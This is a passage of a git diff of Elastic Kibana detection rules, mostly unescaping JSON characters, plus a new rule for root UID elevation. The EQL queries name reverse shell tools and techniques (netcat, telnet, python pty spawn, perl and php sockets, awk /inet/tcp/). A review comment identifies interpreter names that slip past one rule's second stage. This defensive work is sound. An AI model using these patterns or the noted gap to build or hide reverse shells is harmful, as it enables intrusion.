\"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : 
\"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_5.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_5.json index 32992617ec8..a243b8bf462 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_5.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_5.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count \u003e= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", 
\"::1\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", "references": [ 
 "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md"
 ],
@@ -86,7 +86,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -108,7 +108,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_6.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_6.json
index 2ffcccf9392..a5e68ad6478 100644
--- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_6.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count \u003e= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", 
\"::1\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"fork\") and (\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3 and not process.args == \"-z\") or\n (process.name : \"telnet\" and process.args_count >= 3)\n ) and process.parent.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\",\n \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\")]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and \n destination.ip != null and not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n", "references": [ 
"https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_104.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_104.json index aa8c28dca19..10377be65d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_104.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
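Review bot: The two stages of the `_6.json` query (the `@@ -11,7 +11,7 @@` hunk ending on this line, the highest version of this rule visible here) disagree on process names, so some of the interpreters the first stage deliberately matches can never complete the sequence. The exec stage accepts `perl*`, `ruby*` and `("awk", "gawk", "mawk", "nawk")`, but the network stage requires `process.name : (..., "perl", "ruby", ..., "awk")` exactly, and because the sequence is joined on `process.entity_id` the network event carries the same name as the exec event; a shell launched as `perl5.36`, `ruby3.1`, `gawk`, `mawk` or `nawk` therefore matches stage one and is silently dropped at stage two. The name filter in the second stage is largely redundant given the entity join, but if it is kept it should mirror the first: `process.name : ("python*", "php*", "perl*", "ruby*", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk", "gawk", "mawk", "nawk")`. The same mismatch is present in the `_5.json` version above; the unescaping this commit performs does not change the query's semantics, so this is a pre-existing gap rather than a regression.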
diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_105.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_105.json index e916b2d5acc..11fdc51ad14 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_105.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_106.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_106.json index 50a083f0341..a2750385aea 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_106.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_107.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_107.json index 0bfca08c47b..4f89293beb4 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_107.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_108.json b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_108.json index c6269be7209..6275380904c 100644 --- a/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/76fd43b7-3480-4dd9-8ad7-8bd36bfad92f_108.json 
@@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "76fd43b7-3480-4dd9-8ad7-8bd36bfad92f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_104.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_104.json index 911c4927951..ff5722583a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_104.json +++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_104.json 
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_105.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_105.json
index 7f70429157c..6dc95cbc393 100644
--- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_106.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_106.json
index 82cab8caab7..3215e0bf9ca 100644
--- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_106.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_107.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_107.json
index f751fd2dd34..dda87e75984 100644
--- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_107.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 21,
 "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_108.json b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_108.json
index 17971da1b9c..b475539cf73 100644
--- a/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/770e0c4d-b998-41e5-a62e-c7901fd7f470_108.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 21,
 "rule_id": "770e0c4d-b998-41e5-a62e-c7901fd7f470",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_101.json b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_101.json
index db6eeec7c4e..e175642670e 100644
--- a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_101.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_102.json b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_102.json
index 369a360d17a..d4a15e4900e 100644
--- a/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/774f5e28-7b75-4a58-b94e-41bf060fdd86_102.json
@@ -49,7 +49,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_1.json b/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_1.json
new file mode 100644
index 00000000000..59b3cf55f08
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/7787362c-90ff-4b1a-b313-8808b1020e64_1.json
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the elevation of regular user permissions to root permissions through a previously unknown executable. Attackers may attempt to evade detection by hijacking the execution flow and hooking certain functions/syscalls through a rootkit in order to provide easy access to root via a special modified command.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "UID Elevation from Previously Unknown Executable", + "new_terms_fields": [ + "host.id", + "process.executable", + "process.command_line" + ], + "query": "host.os.type:\"linux\" and event.category:\"process\" and event.action:\"uid_change\" and event.type:\"change\" and user.id:\"0\"\nand process.parent.name:(\"bash\" or \"dash\" or \"sh\" or \"tcsh\" or \"csh\" or \"zsh\" or \"ksh\" or \"fish\") and not (\n process.executable:(\n /bin/* or /usr/bin/* or /sbin/* or /usr/sbin/* or /snap/* or /tmp/newroot/* or /var/lib/docker/* or /usr/local/*\n ) or\n process.name:(\n \"bash\" or \"dash\" or \"sh\" or \"tcsh\" or \"csh\" or \"zsh\" or \"ksh\" or \"fish\" or \"sudo\" or \"su\" or \"apt\" or \"apt-get\" or\n \"aptitude\" or \"squid\" or \"snap\" or \"fusermount\" or \"pkexec\" or \"umount\"\n ) or\n process.args:/usr/bin/python*\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": 